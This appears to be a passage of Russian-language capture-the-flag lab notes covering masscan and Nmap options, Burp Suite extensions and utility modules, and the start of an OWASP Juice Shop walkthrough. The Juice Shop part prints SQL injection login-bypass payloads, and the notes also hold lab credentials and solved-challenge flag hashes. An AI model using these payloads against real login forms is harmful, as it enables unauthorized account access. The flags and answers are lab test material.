• masscan MACHINE_IP/24 -p443
• masscan MACHINE_IP/24 -p80,443
• masscan MACHINE_IP/24 -p22-25
• masscan MACHINE_IP/24 ‐‐top-ports 100

Masscan не установлен на устройстве AttackBox; однако его можно установить с помощью команды apt install masscan.

Task 8. Using Reverse-DNS Lookup

По умолчанию Nmap использует обратные DNS-запросы к онлайн-хостам. Поскольку имена хостов могут многое рассказать, этот шаг может быть полезным. Однако, если вы не хотите отправлять такие DNS- запросы, вы можете -nпропустить этот шаг.

По умолчанию Nmap выполняет поиск работающих хостов; однако вы можете использовать опцию -Rдля запроса DNS-сервера даже для неработающих хостов. Если вы хотите использовать конкретный DNS-сервер, вы можете добавить соответствующую --dns-servers DNS_SERVER опцию.

Task 9. Summary

Пройдя это задание, вы узнали, как ARP , ICMP, TCP и UDP могут обнаруживать активные хосты. Любой ответ от хоста указывает на то, что он находится в сети. Ниже приведено краткое описание параметров командной строки Nmap , которые мы рассмотрели.

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Задание 1. Введение

Добро пожаловать в комнату расширения Burp Suite!

В этой комнате мы рассмотрим модульные аспекты Burp Suite , сосредоточившись на его открытой функциональности, которая позволяет разработчикам создавать дополнительные модули для фреймворка.

Хотя разработка модулей Burp выходит за рамки данного модуля, мы кратко рассмотрим документацию по API и обсудим типичный процесс добавления новых модулей с помощью Burp Suite BApp Store .

Для прохождения этой комнаты вам не понадобится целевой компьютер, но убедитесь, что у вас есть доступ к Burp Suite . Если вы используете AttackBox, убедитесь, что он запущен, нажав синюю кнопку «Запустить AttackBox» в правом верхнем углу комнаты. Давайте погрузимся в захватывающий мир расширений и расширяемости Burp Suite !

Задание 2. The Extensions Interface

Интерфейс «Расширения» в Burp Suite предоставляет обзор расширений, загруженных в инструмент. Давайте рассмотрим различные компоненты этого интерфейса:

1. Список расширений : В верхнем поле отображается список расширений, установленных в Burp Suite для текущего проекта. Вы можете активировать или деактивировать отдельные расширения.
2. Управление расширениями : В левой части интерфейса расширений расположены параметры для управления расширениями:
• Добавить : С помощью этой кнопки вы можете установить новые расширения из файлов на вашем диске. Эти файлы могут представлять собой модули, написанные вами самостоятельно, или модули, полученные из внешних источников, которые недоступны в официальном магазине BApp.
• Удалить : Эта кнопка позволяет удалить выбранные расширения из Burp Suite .
• Кнопки «Вверх/Вниз» : Эти кнопки управляют порядком отображения установленных расширений. Порядок определяет последовательность вызова расширений при обработке трафика. Расширения применяются в порядке убывания, начиная с верхней части списка и двигаясь вниз. Порядок имеет важное значение, особенно при работе с расширениями, изменяющими запросы, поскольку некоторые из них могут конфликтовать или мешать другим.
3. Подробности, вывод и ошибки : В нижней части окна расположены разделы для выбранного в данный момент расширения:
• Подробности : В этом разделе представлена ​​информация о выбранном расширении, такая как его название, версия и описание.
• Вывод : Расширения могут выводить информацию во время своего выполнения, и в этом разделе отображаются все соответствующие выходные данные или результаты.
• Ошибки : Если во время выполнения расширения возникнут какие-либо ошибки, они будут отображены в этом разделе. Это может быть полезно для отладки и устранения неполадок, связанных с расширением.

Вкратце, интерфейс расширений в Burp Suite позволяет пользователям управлять установленными расширениями и отслеживать их состояние, активировать или деактивировать для конкретных проектов, а также просматривать важные сведения, результаты и ошибки, связанные с каждым расширением. Использование расширений превращает Burp Suite в мощную и настраиваемую платформу для различных задач тестирования безопасности и оценки веб-приложений.

Задание 3. The BApp Store

В Burp Suite магазин приложений Burp App Store (BApp Store) позволяет легко находить и беспрепятственно интегрировать официальные расширения в инструмент. Расширения могут быть написаны на различных языках, наиболее распространенными являются Java и Python. Расширения на Java автоматически интегрируются с фреймворком Burp Suite , в то время как для расширений на Python требуется интерпретатор Jython.

Чтобы ознакомиться с BApp Store и установить расширение для Java, давайте установим расширение Request Timer , написанное Ником Тейлором. Расширение Request Timer позволяет регистрировать время, необходимое для получения ответа на каждый запрос. Эта функция особенно полезна для выявления и использования уязвимостей, основанных на времени. Например, если форма авторизации обрабатывает запросы с действительными именами пользователей на секунду дольше, чем запросы с недействительными, мы можем использовать разницу во времени, чтобы определить, какие имена пользователей являются действительными.

Выполните следующие действия, чтобы установить расширение Request Timer из магазина BApp:

1. Перейдите во вкладку BApp Store в Burp Suite .
2. Воспользуйтесь функцией поиска, чтобы найти Request Timer . Для этого расширения должен быть только один результат.
3. Нажмите на найденное расширение, чтобы просмотреть более подробную информацию.
4. Нажмите кнопку «Установить» , чтобы установить расширение Request Timer.

После успешной установки расширения вы заметите, что в главном меню в верхней части интерфейса Burp Suite появится новая вкладка . Разные расширения могут вести себя по-разному. Некоторые могут добавлять новые пункты в контекстные меню, вызываемые щелчком правой кнопки мыши, в то время как другие создают совершенно новые вкладки в главной строке меню.

Поскольку данная установка является лишь примером использования BApp Store, мы не будем здесь рассматривать, как использовать Request Timer. Однако я настоятельно рекомендую открыть новую вкладку и изучить расширение, чтобы лучше понять его функциональность. Request Timer может быть полезен в различных сценариях, особенно при оценке безопасности веб-приложений и выявлении потенциальных уязвимостей, связанных со временем.

Задание 4. Jython

Примечание: Если вы используете AttackBox, интеграция с Jython уже выполнена, поэтому вы можете пропустить этот шаг.

Для использования модулей Python в Burp Suite необходимо подключить JAR- файл интерпретатора Jython, который представляет собой реализацию Python на Java. Интерпретатор Jython позволяет запускать расширения на основе Python в Burp Suite.

Выполните следующие шаги, чтобы интегрировать Jython в Burp Suite на вашем локальном компьютере:

1. Скачать JAR-файл Jython : Зайдите на веб-сайт Jython и скачайте автономный JAR- архив. Найдите опцию «Jython Standalone» . Сохраните JAR- файл в папку на вашем диске.
2. Настройка Jython в Burp Suite : Откройте Burp Suite и перейдите в модуль «Расширения» . Затем перейдите на вкладку « Настройки расширений» .
3. Среда Python : прокрутите вниз до раздела "Среда Python".
4. Укажите местоположение JAR-файла Jython : в поле «Местоположение автономного JAR- файла Jython» укажите путь к загруженному JAR- файлу Jython.

После выполнения этих шагов Jython будет интегрирован с Burp Suite , что позволит вам использовать модули Python в этом инструменте. Эта интеграция значительно увеличивает количество доступных расширений и расширяет ваши возможности при выполнении различных задач по тестированию безопасности и оценке веб-приложений.

Примечание: Процесс добавления Jython в Burp Suite одинаков для всех операционных систем, поскольку Java — это многоплатформенная технология.

Задание 5. The Burp Suite API

В модуле расширений Burp Suite вы получаете доступ к широкому спектру API- интерфейсов, позволяющих создавать и интегрировать ваши модули с Burp Suite . Эти API предоставляют различные функциональные возможности, позволяя расширять возможности Burp Suite в соответствии с вашими конкретными потребностями.

Чтобы просмотреть доступные конечные точки API , перейдите на вкладку «API» в модуле «Расширения». Каждый элемент, указанный на левой панели, представляет собой отдельную конечную точку API , доступную из расширений.

API расширений предоставляют разработчикам значительные возможности и гибкость при создании пользовательских расширений. Вы можете использовать эти API для беспрепятственного взаимодействия с существующим функционалом Burp Suite и адаптировать свои расширения для выполнения конкретных задач.

Burp Suite поддерживает написание расширений на нескольких языках, например:

1. Java (нативно): Вы можете напрямую использовать Java для написания расширений для Burp Suite , используя преимущества мощных доступных API.
2. Python (через Jython): Если вы предпочитаете Python в качестве языка программирования, вы можете использовать Jython, который представляет собой реализацию Python на Java, для создания расширений Burp Suite .
3. Ruby (через JRuby): Разработчики, знакомые с Ruby, могут использовать JRuby, реализацию Ruby на Java, для создания расширений Burp Suite .

Важно отметить, что разработка расширений для Burp Suite может быть сложной задачей, выходящей за рамки данного модуля. Однако, если вас интересует дальнейшее изучение этой области и создание пользовательских расширений, PortSwigger предоставляет исчерпывающий справочник, который является отличным ресурсом для разработки расширений Burp Suite .

Чтобы узнать больше о разработке расширений для Burp Suite и получить доступ к подробной справочной информации, вы можете посетить официальную документацию PortSwigger . Этот ресурс предоставит информацию и рекомендации, необходимые для создания мощных и настраиваемых расширений, которые улучшат ваш опыт работы с Burp Suite .

Задание 6. Заключение

Поздравляем! Вы успешно завершили модуль «Расширения Burp Suite» . Пройдя этот модуль, вы получили ценные знания о том, как использовать расширения для расширения функциональности Burp Suite .

Теперь вы хорошо понимаете, как:

1. Устанавливайте и управляйте расширениями из магазина BApp, чтобы расширить возможности Burp Suite.
2. Интегрируйте Jython, чтобы использовать модули Python в Burp Suite .
3. Изучите API, позволяющие разрабатывать собственные модули на Java, Python или Ruby.

Обладая этими навыками, вы сможете в полной мере использовать модуль Burp Suite Extensions при тестировании безопасности веб-приложений и оценке уязвимостей.

Отличная работа над модулем, и отдельная благодарность за вашу целеустремленность и старания! Продолжайте изучать, совершенствовать и оттачивать свои навыки в области кибербезопасности. Успешного хакинга!

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Ознакомьтесь с некоторыми менее известными модулями Burp Suite.

Добро пожаловать в раздел «Другие модули Burp Suite» !

Помимо широко известных комнат Repeater и Intruder , в Burp Suite есть несколько менее известных модулей. Именно на них мы сосредоточимся в ходе исследования этой комнаты.

В центре внимания будут инструменты Decoder, Comparer, Sequencer и Organizer. Они упрощают работу с закодированным текстом, позволяют сравнивать наборы данных, анализировать случайность в захваченных токенах и помогают сохранять и аннотировать копии HTTP- сообщений, к которым вы, возможно, захотите вернуться позже. Хотя эти задачи кажутся простыми, их выполнение в Burp Suite может существенно сэкономить время, что подчеркивает важность эффективного использования этих модулей.

Итак, без лишних слов, давайте перейдем к первому инструменту — декодеру.

Задание 2. Декодер: Обзор

Модуль Decoder в Burp Suite предоставляет пользователю возможности манипулирования данными. Как следует из названия, он не только декодирует данные, перехваченные во время атаки, но и предоставляет функцию кодирования собственных данных, подготавливая их к передаче целевому объекту. Decoder также позволяет создавать хеш-суммы данных, а также предоставляет функцию Smart Decode, которая пытается рекурсивно декодировать предоставленные данные, пока они не вернутся в исходный текстовый формат (подобно функции "Magic" в Cyberchef ).

Чтобы получить доступ к декодеру, перейдите во вкладку «Декодер» в верхнем меню и просмотрите доступные параметры:

Этот интерфейс предоставляет множество вариантов.

1. Это поле служит рабочей областью для ввода или вставки данных, требующих кодирования или декодирования. Как и в других модулях Burp Suite , данные можно перемещать в эту область из разных частей платформы с помощью опции « Отправить в декодер», активируемой щелчком правой кнопки мыши.
2. В верхней части списка справа есть возможность обрабатывать входные данные либо как текстовые, либо как шестнадцатеричные байтовые значения.
3. По мере продвижения вниз по списку появляются выпадающие меню для кодирования, декодирования или хеширования входных данных.
4. Функция Smart Decode , расположенная в конце, пытается автоматически декодировать входные данные.

После ввода данных в поле ввода интерфейс дублируется, отображая результат нашей операции. Затем мы можем выбрать применение дальнейших преобразований, используя те же параметры:

Задание 3. Декодер: кодирование/декодирование

Кодирование и декодирование с помощью декодера

Теперь давайте подробно рассмотрим параметры ручного кодирования и декодирования. Они идентичны независимо от того, выбрано ли меню декодирования или кодирования:

• Plain : Это относится к исходному тексту до применения каких-либо преобразований.
• URL : Кодирование URL используется для обеспечения безопасной передачи данных в URL-адресе веб-запроса. Оно включает замену символов их кодов ASCII в шестнадцатеричном формате, перед которыми стоит символ процента (%). Этот метод крайне важен для тестирования любых веб-приложений.Например, кодирование символа косой черты ( / ), код символа ASCII которого равен 47, преобразует его в шестнадцатеричный код в 2F , таким образом, в кодировке URL он становится %2F . Декодер можно использовать для проверки этого, введя косую черту в поле ввода, а затем выбрав Encode as -> URL:
• HTML : Кодирование HTML-сущностей заменяет специальные символы амперсандом (&), за которым следует либо шестнадцатеричное число, либо ссылка на экранируемый символ, и заканчивается точкой с запятой (;). Этот метод обеспечивает безопасное отображение специальных символов в HTML и помогает предотвратить такие атаки, как XSS. Опция HTML в декодере позволяет закодировать любой символ в его экранированный HTML-формат или декодировать захваченные HTML-сущности. Например, чтобы декодировать ранее обсуждавшуюся кавычку, введите закодированную версию и выберите Decode as -> HTML:
• Base64 : Base64 — широко используемый метод кодирования, преобразующий любые данные в формат, совместимый с ASCII. Принцип его работы на данном этапе не имеет решающего значения; однако заинтересованные лица могут ознакомиться с базовой математической основой здесь .
• ASCII Hex : Эта опция преобразует данные между ASCII и шестнадцатеричным представлением. Например, слово "ASCII" можно преобразовать в шестнадцатеричное число "4153434949". Каждый символ преобразуется из своего числового представления ASCII в шестнадцатеричное.
• Шестнадцатеричная, восьмеричная и двоичная системы счисления : эти методы кодирования применяются исключительно к числовым данным, преобразуя их между десятичной, шестнадцатеричной, восьмеричной (основание восемь) и двоичной системами счисления.
• Gzip : Gzip сжимает данные, уменьшая размер файлов и страниц перед передачей в браузер. Более быстрая загрузка крайне желательна для разработчиков, стремящихся улучшить свои SEO-показатели и избежать неудобств для пользователей. Декодер облегчает ручное кодирование и декодирование данных gzip, хотя они часто не являются допустимыми ASCII/Unicode. Например:

Эти методы можно комбинировать. Например, фразу ("Burp Suite Decoder") можно преобразовать в шестнадцатеричный код ASCII, а затем в восьмеричный:

В совокупности эти методы предоставляют нам существенный контроль над данными, которые мы кодируем или декодируем.

Каждый метод кодирования/декодирования обозначен определенным цветом, что позволяет быстро определить применяемое преобразование.

шестнадцатеричный формат

Хотя ввод данных в формате ASCII удобен, иногда требуется побайтовое редактирование входных данных. Именно здесь на помощь приходит функция «Шестнадцатеричный просмотр», которую можно выбрать над параметрами декодирования:

Эта функция позволяет просматривать и изменять данные в шестнадцатеричном байтовом формате, что является важным инструментом при работе с бинарными файлами или другими данными, не являющимися ASCII-символами.

Smart Decode

Наконец, у нас есть опция «Умное декодирование» . Эта функция пытается автоматически декодировать закодированный текст. Например, текст Burp Suite автоматически распознается как HTML-код и соответственно декодируется:

Хотя эта функция и не идеальна, она может стать быстрым решением для расшифровки неизвестных фрагментов данных.

Задание 4. Декодер: Хэширование

HashВ дополнение к функциям кодирования/декодирования, Decoder также предоставляет возможность генерировать хеш-суммы для наших данных.

Теория

Хэширование — это односторонний процесс, преобразующий данные в уникальную сигнатуру. Чтобы функция считалась алгоритмом хэширования, её результат должен быть необратимым. Эффективный алгоритм хэширования гарантирует, что каждый входной параметр данных будет генерировать совершенно уникальный хэш. Например, использование алгоритма MD5 для получения хэш-суммы для текста "MD5sum" даёт результат 4ae1a02de5bd02a5515f583f4fca5e8c. Использование того же алгоритма для "MD5SUM" даёт совершенно другой хэш, несмотря на близкое сходство входных данных: 13b436b09172400c9eb2f69fbd20adad. Поэтому хэши обычно используются для проверки целостности файлов и документов, поскольку даже незначительное изменение файла существенно меняет хэш-сумму.

Примечание: Алгоритм MD5 устарел и не должен использоваться в современных приложениях.

Кроме того, хеши используются для безопасного хранения паролей, поскольку односторонний процесс хеширования делает пароли относительно защищенными, даже если база данных будет скомпрометирована. Когда пользователь создает пароль, приложение хеширует его и сохраняет. Во время входа в систему приложение хеширует введенный пароль и сравнивает его с сохраненным хешем; если они совпадают, пароль верен. Используя этот метод, приложению никогда не нужно хранить исходный (открытый) пароль.

Хэширование в декодере

Декодер позволяет создавать хеш-суммы для данных непосредственно в Burp Suite; он работает аналогично параметрам кодирования/декодирования, которые мы обсуждали ранее. В частности, мы щелкаем по выпадающему меню «Хеш» и выбираем алгоритм из списка:

Примечание: Этот список значительно длиннее, чем список алгоритмов кодирования/декодирования — стоит пролистать его, чтобы увидеть множество доступных алгоритмов хеширования.

Продолжая наш предыдущий пример, введем "MD5sum" в поле ввода, а затем прокрутим список вниз, пока не найдем " MD5 ". Применение этой команды автоматически переведет нас в шестнадцатеричный режим отображения:

Результатом работы хеш-алгоритма является не чистый текст в формате ASCII/Unicode. Поэтому принято преобразовывать результат работы алгоритма в шестнадцатеричную строку; это и есть та самая форма «хеша», с которой вы, возможно, знакомы.

Завершим это, применив к хеш-сумме кодировку "ASCII Hex", чтобы получить аккуратную шестнадцатеричную строку из нашего первоначального примера.

Вот полный процесс:

Задание 5. Сравнительный анализ: Обзор

Как следует из названия, Comparer позволяет сравнивать два фрагмента данных либо по ASCII-словам, либо по байтам.

Давайте сначала рассмотрим интерфейс:

Интерфейс можно разделить на три основных раздела:

1. Слева мы видим элементы, которые нужно сравнить. Когда мы загружаем данные в Comparer, они отображаются в виде строк в этих таблицах. Мы выбираем два набора данных для сравнения.
2. В правом верхнем углу расположены параметры для вставки данных из буфера обмена (Вставить), загрузки данных из файла (Загрузить), удаления текущей строки (Удалить) и очистки всех наборов данных (Очистить).
3. Наконец, в правом нижнем углу мы можем выбрать сравнение наборов данных по словам или по байтам. Неважно, какой из этих вариантов вы выберете изначально, поскольку это можно изменить позже. Это кнопки, которые мы нажимаем, когда готовы сравнить выбранные данные.

Как и в большинстве модулей Burp Suite , мы также можем загружать данные в Comparer из других модулей, щелкнув правой кнопкой мыши и выбрав «Отправить в Comparer» .

После того, как мы добавим как минимум два набора данных для сравнения и нажмем либо «Слова» , либо «Байты» , во всплывающем окне отобразится результат сравнения:

Это окно также состоит из трех отдельных разделов:

1. Сравниваемые данные занимают большую часть окна; их можно просмотреть как в текстовом, так и в шестнадцатеричном формате. Исходный формат зависит от того, выбрали ли мы сравнение по словам или по байтам в предыдущем окне, но это можно изменить с помощью кнопок над полями сравнения.
2. В левом нижнем углу находится ключ сравнения, показывающий, какие цвета обозначают измененные, удаленные и добавленные данные в двух наборах данных.
3. Флажок «Синхронизировать представления» находится в правом нижнем углу окна. При выборе этого флажка гарантируется синхронизация форматов обоих наборов данных. Другими словами, если вы измените один из них на шестнадцатеричный формат, другой автоматически синхронизируется.

В заголовке окна отображается общее количество найденных различий.

Задание 6. Компаратор: Пример

Теперь мы знаем, что делает Comparer, но в чём его польза?

Существует множество ситуаций, когда возможность быстро сравнить два (потенциально очень больших) массива данных может оказаться полезной.

Например, при проведении атаки методом перебора паролей или подбора учетных данных с помощью Intruder, вы можете сравнить два ответа разной длины, чтобы определить, в чем заключаются различия и указывают ли эти различия на успешный вход в систему.

Практический пример

1. Перейти кhttp://10.114.155.32/support/loginПопробуйте войти в систему с неверным именем пользователя и паролем — перехватите запрос в Burp Proxy .
2. Отправьте запрос в Repeater с помощью Ctrl + R(или аналогичного инструмента для Mac) или щелкнув правой кнопкой мыши по запросу в модуле Proxy и выбрав «Отправить в Repeater» .
3. Отправьте запрос, затем щелкните правой кнопкой мыши по ответу и выберите «Отправить в Comparer» .
4. На вкладке «Ретранслятор» измените учетные данные на следующие: Отправьте запрос еще раз, затем передайте новый ответ в Comparer.
• Имя пользователя:support_admin
• Пароль:w58ySK4W

Задание 7. Секвенсор: Обзор

Sequencer позволяет нам оценивать энтропию , или случайность, «токенов». Токены — это строки, используемые для идентификации чего-либо, и в идеале они должны генерироваться криптографически безопасным способом. Эти токены могут быть сессионными cookie-файлами или токенами защиты от межсайтовой подделки запросов ( CSRF ) , используемыми для защиты при отправке форм. Если эти токены не генерируются безопасным способом, то теоретически мы можем предсказывать будущие значения токенов. Последствия могут быть существенными, например, если рассматриваемый токен используется для сброса пароля.

Начнём с рассмотрения интерфейса секвенсора:

В Sequencer есть два основных способа проведения анализа токенов:

• Захват в реальном времени : это более распространенный метод, и он является подвкладкой по умолчанию для Sequencer. Захват в реальном времени позволяет передать в Sequencer запрос на генерацию токена для анализа. Например, мы можем захотеть передать Sequencer POST-запрос к конечной точке авторизации, зная, что сервер ответит cookie-файлом. После передачи запроса мы можем дать указание Sequencer начать захват в реальном времени. Затем он автоматически выполнит тот же запрос тысячи раз, сохраняя сгенерированные образцы токенов для анализа. После сбора достаточного количества образцов мы останавливаем Sequencer и позволяем ему анализировать захваченные токены.
• Ручная загрузка : Это позволяет загрузить список предварительно сгенерированных образцов токенов непосредственно в Sequencer для анализа. Использование ручной загрузки избавляет от необходимости отправлять тысячи запросов к целевому объекту, что может быть избыточным и ресурсоемким процессом. Однако для этого требуется большой список предварительно сгенерированных токенов.

В этой комнате мы сосредоточимся на записи видео в режиме реального времени.

Задание 8. Секвенсор: Захват в реальном времени

Отлично, давайте перейдем к процессу использования функции захвата данных в реальном времени Sequencer для анализа энтропии токена защиты от перебора паролей, используемого в форме входа в административную панель.

Сначала перехватите запрос http://10.114.155.32/admin/login/в прокси-сервере . Щелкните правой кнопкой мыши по запросу и выберите «Отправить в секвенсор» .

В разделе «Расположение токена в ответе» можно выбрать между Cookie , полем формы и пользовательским расположением . Поскольку в данном случае мы тестируем loginToken, выберите переключатель «Поле формы» и выберите loginToken из выпадающего меню:

В данной ситуации мы можем смело оставить все остальные параметры по умолчанию. Поэтому нажмите кнопку « Начать захват в реальном времени» .

Откроется новое окно, указывающее на то, что в данный момент идёт захват токенов, и отображающее количество захваченных токенов. Подождите, пока не будет захвачено достаточное количество токенов (примерно 10 000 должно быть достаточно); чем больше токенов мы получим, тем точнее будет наш анализ.

После того, как будет собрано около 10 000 токенов, нажмите «Пауза» , а затем выберите кнопку «Анализировать сейчас» :

Важно отметить, что мы могли бы также остановить захват данных. Однако, выбрав паузу, мы сохраняем возможность возобновить захват данных позже, если в отчете окажется недостаточно выборок для точного расчета энтропии токена .

Если бы нам требовались периодические обновления результатов анализа, мы могли бы также установить флажок «Автоматический анализ». Эта опция указывает Burp выполнять анализ энтропии после каждых 2000 запросов, обеспечивая частые обновления, точность которых будет возрастать по мере загрузки большего количества образцов в Sequencer.

На данном этапе также стоит отметить, что мы можем скопировать или сохранить захваченные токены для дальнейшего анализа в будущем.

После нажатия кнопки «Анализировать сейчас » Burp проанализирует энтропию токена и сгенерирует отчет.

Задание 9. Секвенатор: Анализ

Теперь, когда у нас есть отчет по анализу энтропии нашего токена, пришло время его проанализировать!

Сгенерированный отчет об анализе энтропии разделен на четыре основных раздела. Первый из них — это сводка результатов. В сводке содержится следующая информация:

• Общий результат : Это дает общую оценку безопасности механизма генерации токенов. В данном случае уровень энтропии указывает на то, что токены, вероятно, генерируются безопасно.
• Эффективная энтропия : Этот показатель измеряет степень случайности токенов. Эффективная энтропия в 117 бит является относительно высокой, что указывает на достаточную случайность токенов и, следовательно, на их защиту от атак методом предсказания или перебора.
• Надежность : Уровень значимости 1% означает, что существует 99% уверенности в точности результатов. Этот уровень уверенности достаточно высок, что гарантирует точность оценки эффективной энтропии .
• Образец : Здесь представлена ​​подробная информация об образцах токенов, проанализированных в процессе тестирования энтропии , включая количество токенов и их характеристики.

Хотя сводный отчет часто содержит достаточно информации для оценки безопасности процесса генерации токенов, важно помнить, что в некоторых случаях может потребоваться дополнительное расследование. Анализ на уровне символов и битов может дать более детальное представление о случайности токенов, особенно когда сводные результаты вызывают потенциальные опасения.

Хотя отчет об энтропии может служить надежным индикатором безопасности механизма генерации токенов, необходимы более убедительные доказательства. На безопасность токенов могут влиять и другие факторы, а природа теории вероятности и статистики подразумевает наличие определенной степени неопределенности. Тем не менее, эффективная энтропия в 117 бит с уровнем значимости 1% свидетельствует о надежном и безопасном процессе генерации токенов.

Задание 10. Организатор: Обзор

Модуль «Организатор» в Burp Suite предназначен для хранения и аннотирования копий HTTP- запросов, к которым вы, возможно, захотите вернуться позже. Этот инструмент может быть особенно полезен для организации рабочего процесса тестирования на проникновение. Вот некоторые из его ключевых функций:

• Вы можете сохранять запросы, которые хотите изучить позже, сохранять запросы, которые вы уже определили как интересные, или сохранять запросы, которые хотите добавить в отчет позже.
• Вы можете отправлять HTTP- запросы в Burp Organizer из других модулей Burp, таких как Proxy или Repeater . Для этого щелкните правой кнопкой мыши по запросу и выберите «Отправить в Organizer» или используйте стандартную горячую клавишу Ctrl + O. Каждый HTTP- запрос, отправленный в Organizer, представляет собой копию исходного запроса, сохраненную в момент отправки запроса в Organizer, доступную только для чтения.
• Запросы хранятся в таблице, которая содержит такие столбцы, как порядковый номер запроса, время отправки запроса, статус рабочего процесса, инструмент Burp, с которого был отправлен запрос, метод HTTP , имя хоста сервера, путь к файлу в URL, строка запроса в URL, количество параметров в запросе, код состояния HTTP ответа, длина ответа в байтах и ​​любые сделанные вами заметки.

Чтобы просмотреть запрос и ответ:

1. Щелкните по любому элементу Органайзера.
2. И запрос, и ответ доступны только для чтения. Вы можете выполнить поиск внутри запроса или ответа, выделить запрос, а затем воспользоваться строкой поиска под запросом.

Задание 11. Заключение

Поздравляем с завершением работы над модулем "Другие модули Burp Suite" !

Вкратце, Decoder позволяет кодировать и декодировать данные, упрощая чтение и понимание передаваемой информации. Comparer позволяет выявлять различия между двумя наборами данных, что может иметь решающее значение для обнаружения уязвимостей или аномалий. Sequencer помогает проводить анализ энтропии токенов, предоставляя информацию о случайности их генерации и, следовательно, об уровне их безопасности. Organizer позволяет хранить и аннотировать копии HTTP- запросов, к которым вы, возможно, захотите вернуться позже.

Базовое понимание этих инструментов расширяет ваши навыки в области тестирования веб-приложений на проникновение.

В следующем и заключительном зале этого модуля вы познакомитесь с инструментом Burp Suite Extensions .

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

В этой комнате используется уязвимое веб-приложение Juice Shop, чтобы научиться выявлять и использовать распространенные уязвимости веб-приложений.

1. Открыто для бизнеса!

В этой комнате мы рассмотрим 10 самых распространенных уязвимостей в веб-приложениях по версии OWASP . Они встречаются во всех типах веб-приложений. Но сегодня мы поговорим о собственном изобретении OWASP — Juice Shop!

Перед прохождением этой комнаты рекомендуется пройти бесплатные комнаты Burpsuite « Burpsuite Basics » и « Burpsuite Repeater» !

Juice Shop — это большое приложение, поэтому мы не будем рассматривать все темы из топ-10.

Однако мы рассмотрим следующие темы, с которыми рекомендуем вам ознакомиться по мере прохождения этого раздела.

<------------------------------------------------->

Инъекция

Неработающая аутентификация

Раскрытие конфиденциальных данных

Неработающий контроль доступа

Межсайтовая скриптовая атака (XSS)

<------------------------------------------------->

ПОЖАЛУЙСТА, ОБРАТИ ВНИМАНИЕ!

Для выполнения [Задания 3] и последующих заданий потребуется флажок, который отобразится по завершении задания.

Поиск неисправностей

Загрузка веб-приложения занимает от 2 до 5 минут , поэтому, пожалуйста, наберитесь терпения!

Временно отключите Burp в настройках прокси для текущего браузера. Обновите страницу, и флажок отобразится.

(Это не проблема самого приложения, а проблема Burp, из-за которой флаг не отображается. )

Если при выполнении XSS- атак проблема не решается, очистите файлы cookie и данные сайтов, так как это иногда может быть причиной.

Если вы уверены, что выполнили задание, но оно всё ещё не работает, перейдите к [Заданию 8] , это позволит вам проверить его выполнение.

Благодарим OWASP и Бьорна Кимминича за предоставленные материалы.

2. Давайте отправимся в приключение!

Прежде чем перейти к собственно взлому, стоит осмотреться. В Burp отключите режим перехвата и просмотрите сайт. Это позволит Burp регистрировать различные запросы с сервера, которые могут оказаться полезными в дальнейшем.

Запускаем бурп и кидаем проксирование

Это называется обходом приложения, что также является формой разведки !

Вопрос №1: Какой адрес электронной почты у администратора?

В отзывах указан адрес электронной почты каждого пользователя. А при нажатии на продукт Apple Juice отображается адрес электронной почты администратора!

Вопрос №2: Какой параметр используется для поиска?

При нажатии на значок лупы в правом верхнем углу приложения откроется строка поиска.

Затем мы можем ввести какой-либо текст, и нажатие клавиши Enter выполнит поиск только что введенного текста.

Теперь обратите внимание на URL-адрес, который обновится, отобразив только что введенный нами текст.

Теперь после /#/search? и буквы q мы видим параметр поиска.

3. Введите сок

В этой задаче основное внимание будет уделено уязвимостям внедрения кода. Уязвимости внедрения кода представляют собой серьезную опасность для компании, поскольку могут привести к простоям и/или потере данных. Выявление точек внедрения в веб-приложении обычно довольно просто, поскольку большинство из них возвращают ошибку. Существует множество типов атак внедрения кода, некоторые из них:

SQL -инъекция

SQL- инъекция — это когда злоумышленник вводит вредоносный или некорректный запрос для получения или изменения данных из базы данных. А в некоторых случаях — для входа в учетные записи.

Внедрение команд

Внедрение команд — это когда веб-приложения берут входные или управляемые пользователем данные и выполняют их как системные команды. Злоумышленник может изменить эти данные для выполнения собственных системных команд. Это можно наблюдать в приложениях, которые выполняют неправильно настроенные тесты ping.

Тут я попробовал вызвать ошибку

и что то стригерил

Внедрение email-адреса

Внедрение электронных писем — это уязвимость безопасности, позволяющая злоумышленникам отправлять электронные письма без предварительного разрешения почтового сервера. Это происходит, когда злоумышленник добавляет дополнительные данные в поля, которые сервер интерпретирует неправильно.

Но в нашем случае мы будем использовать SQL- инъекцию .

Для получения дополнительной информации: Инъекция

Вопрос №1: Войдите в учетную запись администратора!

После перехода на страницу входа введите данные в поля электронной почты и пароля.

Перед отправкой убедитесь, что режим перехвата включен .

Это позволит нам увидеть данные, отправляемые на сервер!

Теперь мы заменим " a " рядом с адресом электронной почты на: ' или 1=1-- и перешлем его на сервер.

Опять стригирил что то

You successfully solved a challenge: Login Admin (Log in with the administrator's user account.)
Ответ: 690fa3247a99d651e0b26f947baf0b79b4f404a9

Почему это работает?

1. Символ ' закроет скобки в SQL-запросе.
2. Оператор ' ИЛИ ' в SQL-запросе вернет true, если хотя бы одна его часть истинна. Поскольку 1=1 всегда истинно , весь запрос истинен. Таким образом, он сообщит серверу, что адрес электронной почты действителен, и выполнит вход в систему под идентификатором пользователя 0 , который является учетной записью администратора.
3. Символ «--» используется в SQL для комментирования данных; любые ограничения на вход в систему больше не будут работать, поскольку они интерпретируются как комментарий. Это похоже на комментарии # и // в Python и JavaScript соответственно.

Вопрос №2: Войдите в учетную запись Bender!

Аналогично тому, что мы делали в вопросе №1 , теперь войдем в учетную запись Бендера! Снова перехватим запрос на вход, но на этот раз укажем в качестве адреса электронной почты: bender@juice-sh.op'-- .

Теперь перешлите это на сервер!

Но почему бы нам не поставить 1=1 ?

Итак, поскольку адрес электронной почты действителен (что вернет true ), нам не нужно принудительно устанавливать значение true . Таким образом, мы можем использовать '--' для обхода системы авторизации. Обратите внимание, что 1=1 можно использовать, когда адрес электронной почты или имя пользователя неизвестны или недействительны.

You successfully solved a challenge: Login Bender (Log in with Bender's user account.)
Ответ: 5ff5052e879e6fef64124e64c82c84ebc809c6c4

4. Кто взломал мой замок?!

